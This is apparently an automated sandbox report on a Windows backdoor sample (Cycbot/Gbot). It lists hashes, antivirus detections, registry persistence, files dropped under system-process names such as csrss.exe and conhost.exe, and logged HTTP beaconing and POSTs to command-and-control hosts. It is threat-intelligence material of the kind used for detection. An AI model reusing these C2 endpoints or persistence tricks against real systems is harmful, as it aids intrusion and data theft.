Analysis Date: 2014-07-03 00:16:32
MD5: 396c78b088783b42be9e9a9f5d7b8306
SHA1: 0c960848b4a26166aa39679b4a2a41e81d267d66

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text   md5: abdbe96df09ccfaa9ef3e67f2f6eccd1  sha1: 64dbad5a0bc10e11f88e0d0a84af8c0f366b6c67  size: 138752
Section .rdata  md5: 6d5c67e6b6797736c0e9734ddeccb54e  sha1: 5aac7cdd2c5979290032bde868f6e3b8289f52cd  size: 1536
Section .data   md5: 13949fe7d5d447be34076e75ee51caa3  sha1: 719095642af8f3c142e4b54d31b85fdc58b000f3  size: 48640
Section .rsr    md5: 6757fe615ffd81638b9914ae445de01c  sha1: 45e93271843d91b2627a6fcd8733881b13bf2520  size: 512
Timestamp: 2005-09-20 05:00:27
Version: PrivateBuild: 1051
PEhash: 68cb97af1c3c1ffff58105767fad17c6fcdc48f0
IMPhash: 49906df66c2a97e9bc35871c22d49c04
AV  Vendor                          Detection
AV  360 Safe                        Gen:Trojan.Heur.KS.1
AV  Ad-Aware                        Gen:Trojan.Heur.KS.1
AV  Alwil (avast)                   Cybota [Trj]
AV  Arcabit (arcavir)               no_virus
AV  Authentium                      W32/Goolbot.E.gen!Eldorado
AV  Avira (antivir)                 TR/Pakes.psa
AV  CA (E-Trust Ino)                Win32/Gbot.A!generic
AV  CAT (quickheal)                 Trojan.Pakes.gen
AV  ClamAV                          Trojan.Diple-20
AV  Dr. Web                         Trojan.Packed.21411
AV  Emsisoft                        Gen:Trojan.Heur.KS.1
AV  Eset (nod32)                    Win32/Cycbot.AD
AV  Fortinet                        W32/FakeAV.PACK!tr
AV  Frisk (f-prot)                  W32/Goolbot.E.gen!Eldorado (generic, not disinfectable)
AV  F-Secure                        Gen:Trojan.Heur.KS.1
AV  Grisoft (avg)                   Win32/Cryptor
AV  Ikarus                          Backdoor.Win32.Cycbot
AV  K7                              Backdoor ( 003210941 )
AV  Kaspersky                       Backdoor.Win32.Gbot.qr
AV  MalwareBytes                    Spyware.Passwords.XGen
AV  Mcafee                          BackDoor-EXI.gen.h
AV  Microsoft Security Essentials   Backdoor:Win32/Cycbot.G
AV  MicroWorld (escan)              Gen:Trojan.Heur.KS.1
AV  Norman                          winpe/Cycbot.BH
AV  Rising                          Trojan.Win32.Generic.12724E28
AV  Sophos                          Mal/FakeAV-IS
AV  Symantec                        Backdoor.Cycbot!gen2
AV  Trend Micro                     BKDR_CYCBOT.SMIB
AV  VirusBlokAda (vba32)            SScope.Malware-Cryptor.Maxplus.0997

Runtime Details:

Process
↳ C:\malware.exe

Registry HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File PIPE\lsarpc
Creates File C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File \Device\Afd\Endpoint
Creates File C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates Process C:\malware.exe start C:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Process C:\malware.exe start C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex {C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates Mutex {4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex WininetConnectionMutex
Creates Mutex c:!documents and settings!administrator!cookies!
Creates Mutex {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex {EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutex c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS 127.0.0.1
Winsock DNS blenderartists.org
Winsock DNS zonedg.com

Process
↳ C:\malware.exe start C:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe start C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNS blenderartists.org  Type: A  162.159.251.137
DNS blenderartists.org  Type: A  198.41.249.137
DNS zonedg.com          Type: A  208.73.211.242
DNS zonedg.com          Type: A  208.73.211.193
DNS zonedg.com          Type: A  208.73.211.175
DNS zonedg.com          Type: A  208.73.211.174
DNS zonedg.com          Type: A  208.73.211.163
DNS zonetf.com          Type: A  208.73.211.174
DNS zonetf.com          Type: A  208.73.210.219
DNS zonetf.com          Type: A  208.73.211.246
DNS zonetf.com          Type: A  208.73.211.235
DNS zonetf.com          Type: A  208.73.211.233
HTTP GET http://blenderartists.org/external/Banners/facebook.jpg?tq=gP4aKydKteuEn%2FiiWOYW6ieE3daGLUgzCwEhtUtoQ%2Frpb0LPcZoVyeEJFeXP0KmoPEY0HJF2iTRYz%2B4vKpp%2FofYC23Pl24EU5Bx3Sog8MiFYYjRIJFEdEuD3xtqR3mj%2Bov4x45lD0zyxwrAkC3h2tTsxgLRahcruEWUrgE9SDP%2BslgqLbFnSNW93qYsIahDs19usyRQyi%2BRQeI6D%2B4%2F5L%2BbS3bikM%2BTBjut8WnFp3IUlDtVWRYQ0PVwJvdc0e8E02v6j0QEBs1vz7VmM%2BsDKBhkk7mCD4h%2BOWJ9q0S2BoMJDwITrr%2B%2FEKrfrB%2B7WC1oVrEdY%2B2DyTWLcJQE9CUt
  User-Agent: iamx/3.11
HTTP GET http://zonedg.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvQv1ejbwvgS917V65rJqlLfgPiWW1cg
  User-Agent: iamx/3.11
HTTP POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOpPRO%2FUq%2F3vleWbkY%3D
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJsX%2BSNxFKv975Xlm5G
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxFKv975Xlm5G
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP GET http://zonedg.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvQv1ejbwvgS917V65rJqlLfgPiWW1cg
  User-Agent: iamx/3.11
HTTP POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJtX%2BSNxFKv975Xlm5G
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxVKv975Xlm5G
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP GET http://zonedg.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvQv1ejbwvgS917W65rJqlLfgPiWW1cg
  User-Agent: iamx/3.11
Flows TCP 192.168.1.1:1031 ➝ 162.159.251.137:80
Flows TCP 192.168.1.1:1032 ➝ 208.73.211.242:80
Flows TCP 192.168.1.1:1033 ➝ 208.73.211.174:80
Flows TCP 192.168.1.1:1034 ➝ 208.73.211.174:80
Flows TCP 192.168.1.1:1035 ➝ 208.73.211.174:80
Flows TCP 192.168.1.1:1036 ➝ 208.73.211.242:80
Flows TCP 192.168.1.1:1037 ➝ 208.73.211.174:80
Flows TCP 192.168.1.1:1038 ➝ 208.73.211.174:80
Flows TCP 192.168.1.1:1039 ➝ 208.73.211.242:80

Raw Pcap
Strings